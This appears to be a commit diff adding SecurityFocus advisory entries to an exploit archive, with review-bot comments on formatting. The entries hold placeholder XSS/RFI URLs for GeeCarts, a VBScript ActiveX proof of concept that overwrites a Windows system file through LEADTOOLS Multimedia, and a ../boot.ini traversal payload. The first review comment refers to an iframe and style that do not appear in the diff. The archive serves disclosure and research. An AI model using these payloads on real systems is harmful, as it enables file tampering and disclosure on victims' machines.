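Review bot: `z- index:0` in the inline style has a space inside the property name, so browsers drop the declaration, and the iframe `src` has a space after `http://www.example.com/`; both look like line-wrap damage from the advisory text. The whole document has also been collapsed onto one line; keep the original line breaks so the file is reviewable.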


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28470/info
GeeCarts is prone to multiple input-validation vulnerabilities, including remote file-include and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site; other attacks are also possible.
All versions of GeeCarts are reported vulnerable.
http://www.example.com/show.php?id=[XSS or RFI]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28470/info
GeeCarts is prone to multiple input-validation vulnerabilities, including remote file-include and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site; other attacks are also possible.
All versions of GeeCarts are reported vulnerable.
http://www.example.com/search.php?id=[XSS or RFI]


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28470/info
GeeCarts is prone to multiple input-validation vulnerabilities, including remote file-include and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site; other attacks are also possible.
All versions of GeeCarts are reported vulnerable.
http://www.example.com/view.php?id=[XSS or RFI]


@ -0,0 +1,42 @@
source: http://www.securityfocus.com/bid/28442/info
LEADTOOLS Multimedia is prone to multiple vulnerabilities that allow attackers to overwrite arbitrary files. These issues affect multiple ActiveX controls.
An attacker can exploit these issues by enticing an unsuspecting victim to view a malicious HTML page.
Successfully exploiting these issues will allow the attacker to corrupt and overwrite arbitrary files on the victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer).
LEADTOOLS Multimedia 15 is vulnerable; other versions may also be affected.
<pre>
<code><span style="font: 10pt Courier New;"><span
class="general1-symbol"><body
bgcolor="#E0E0E0">--------------------------------------------------------------------
<b>LEADTOOLS Multimedia Toolkit 15 Arbitrary Files Overwrite</b>
url: http://www.leadtools.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
<b><font color=&#039;red&#039;>This was written for educational purpose. Use it
at your own risk.
Author will be not responsible for any damage.</font></b>
--------------------------------------------------------------------
&lt;object classid=&#039;clsid:00150B1A-B1BA-11CE-ABC6-F5B2E79D9E3F&#039;
id=&#039;test&#039;&gt;&lt;/object&gt;
&lt;input language=VBScript onclick=tryMe() type=button value=&#039;Click
here to start the test&#039;&gt;
&lt;script language=&#039;vbscript&#039;&gt;
Sub tryMe
test.SaveSettingsToFile &quot;c:\windows\system_.ini&quot;, 1
MsgBox &quot;Exploit completed!&quot;
End Sub
&lt;/script&gt;
</span></span>
</code></pre>
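Review bot: What got committed is the SecurityFocus page's rendered HTML rather than the advisory text: a `<pre><code><span ...>` wrapper, a stray `<body bgcolor=...>` opened inside it and never closed, and the PoC markup itself entity-encoded (`&lt;object`, `&#039;`, `&quot;`). As a `.html` file this displays the advisory as text and a reader has to decode the entities by hand to see what the author wrote. The other entries in this batch are stored as `.txt`; do the same here and drop the page wrapper.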


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28453/info
File Transfer is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting this issue allows an attacker to access arbitrary files outside of the application's root directory. This can expose sensitive information that could help the attacker launch further attacks.
This issue affects versions prior to File Transfer 1.2f.
../../../../../../../boot.ini
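Review bot: The version line says "prior to File Transfer 1.2f" while the CSV row added in this commit lists `1.2`; make them agree. The PoC is a bare traversal string with no indication of which request or parameter it belongs to, so the file records the payload but not the vector; if the advisory gives no more, say so in the file.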